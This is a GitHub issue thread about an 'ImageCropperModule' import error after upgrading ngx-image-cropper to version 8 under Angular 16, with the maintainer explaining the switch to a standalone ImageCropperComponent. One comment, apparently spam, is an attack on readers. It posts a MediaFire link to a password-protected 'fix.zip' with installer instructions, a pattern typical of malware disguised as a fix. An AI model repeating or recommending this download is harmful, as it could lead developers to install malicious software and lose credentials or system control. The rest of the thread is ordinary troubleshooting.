### ISSUE TITLE
Module '"ngx-image-cropper"' has no exported member 'ImageCropperModule'.ts

### ISSUE THREAD

**Issue by carbdias** [Mawi137/ngx-image-cropper#647]
I'm having the following problem with Angular 16 and "ngx-image-cropper": "8.0.0",
In the NgModule, the import of the module in underlined in red, saying :
**"Module '"ngx-image-cropper"' has no exported member 'ImageCropperModule'.ts"**

I've tried importing BrowserModule and FormsModule too as stated here, but didn't solve the problem
https://stackoverflow.com/questions/61139176/angular-8-ngx-image-cropper-is-not-an-angular-module-import-error

Do you know the cause of this?
Am I using the wrong version of ngx-image-cropper with Angular 16?

Is it because it is looking for a module written in typecript ? ImageCropperModule'.ts ? How can I solve this ?

Thank you in advance,

Carlota

**Comment by Mawi137** [comment]
Hi, since version 8, the module was removed. The cropper is now a standalone component so you only need to import `imports: [ImageCropperComponent]`.

**Comment by carbdias** [comment]
Ok, Thank you for your quick response !!
Just a remark, I've added to declarations, and not imports
and then it seems to work
at least it compiles now
thank you.

**Comment by carbdias** [comment]
O no, false alarm, I still have this :

![image](https://github.com/user-attachments/assets/63898614-761f-4f81-b34e-d8668899a9a5)

**Comment by carbdias** [comment]
Adding it inside the component worsens the compilation

@Component({
  selector: 'app-org-sign-modale',
  templateUrl: './org-sign-modale.component.html',
  styleUrls: ['./org-sign-modale.component.scss'],
  imports: [ImageCropperComponent],
})

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mawi137** [comment]
I'm not sure you can import them in @Component when it's not standalone. 
Adding it to the imports of the module where `'app-org-sign-modale'` is declared should work.

**Comment by faraz-ahmad-uft** [comment]
I am facing the same issue in v8.0. Unfortunately, I downgraded it to v7 then my project started running.

**Comment by tobigit** [comment]
There is missing the standalone-property in the cropper-component. Therefore I can't import the component correctly in my module.

**Comment by Mawi137** [comment]
I just tried with a fresh Angular install (version 16.2.12) with image cropper version 8.0.0. Works fine with both modules and standalone components. So I have no idea what is going wrong for you guys.

To recap, since image cropper version 8, the `ImageCropperModule` no longer exists. You need to replace it in the imports with `ImageCropperComponent`.

**Comment by AtalaySezen** [comment]
> Hi, since version 8, the module was removed. The cropper is now a standalone component so you only need to import `imports: [ImageCropperComponent]`.

thank you!
